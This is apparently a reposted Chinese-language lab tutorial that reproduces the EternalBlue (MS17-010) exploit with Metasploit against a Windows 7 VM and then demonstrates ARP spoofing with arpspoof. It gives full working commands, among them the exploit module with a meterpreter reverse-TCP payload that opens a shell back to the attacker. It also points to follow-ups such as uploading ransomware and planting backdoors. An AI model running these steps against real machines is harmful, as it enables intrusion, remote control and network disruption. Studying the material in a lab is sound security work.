永恒之藍復現
基礎知識介紹
永恒之藍(Eternal Blue)爆發于2017年4月14日晚,是一種利用Windows系統的SMB協議漏洞來獲取系統的最高權限,以此來控制被入侵的計算機 ,
SMB協議:SMB(全稱是Server Message Block)是一個協議服務器資訊塊,它是一種客戶機/服務器、請求/回應協議,通過SMB協議可以在計算機間共享檔案、列印機、命名管道等資源,電腦上的網上鄰居就是靠SMB實作的;SMB協議作業在應用層和會話層,可以用在TCP/IP協議之上,SMB使用TCP139埠和TCP445埠,
實驗準備
靶機:win7(關閉防火墻)IP:192.168.147.132
攻擊機:Linux kali IP:192.168.147.130
實驗步驟
打開kali,啟用我們的工具 Metasploit
msfconsole
每次啟動msfconsole的界面都不同,
利用msf的 auxiliary 模塊進行漏洞驗證
search ms17-010
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.147.132
set rport 445
run
用來查看靶機是否存在ms17_010的漏洞(這里要關閉靶機的防火墻,我被按這好久)
由此可見,存在漏洞
然后就可以嘗試攻擊了
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.147.132 //設定攻擊目標
set payload windows/x64/meterpreter/reverse_tcp // 設定執行緒
set lhost 192.168.147.130 // 設定攻擊機的ip
exploit // 發起攻擊
這里注意,僅支持攻擊win7 x64位的
這樣就算攻擊成功了,
sysinfo
查看系統資訊
反彈shell
shell
https://blog.csdn.net/qq_43431158/article/details/109187455?spm=1001.2014.3001.5501
這么搞就算是漏洞復現成功了
之后就能上傳東西了,可以上傳勒索病毒一類的東西 參考:鏈接
也能后門植入,方便下次訪問:附上文章鏈接
還能kali生成木馬程式,并進行監聽 參考鏈接
總結
這次漏洞復現受益良多,但是這種型別的漏洞復現條件比較苛刻,再加上現在大多數win7電腦都有永恒之藍的補丁,只要不關閉防火墻,永恒之藍就不會得逞
ARP欺騙
什么是ARP
ARP通過目標IP確定目標MAC地址,連接來保證通信
什么是ARP欺騙
假設A,B,C,和郵遞員,A,B相互通信C想知道通信內容,即C冒充郵遞員,給A,B說他是郵遞員, 進而得知通信內容,
即:C將自己的IP地址發送到A,A通過ip地址確定MAC地址,進行通信,被C劫持,無法到達B或者到達B的時間較慢,故達到斷網或者限速的目的,
準備作業
攻擊機:kali linux
靶機:window7
靶機IP:192.168.147.129
默認網關:192.168.147.2
kali中安裝dsniff
其中包含arpspoof,urlsnarf
sudo apt-get install dsniff
實操
arpspoof -i eth0 -t IP 網關
arpspoof -i eth0 -t 192.168.147.129 192.168.147.2
可以看到命令已經生效
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/289184.html
標籤:其他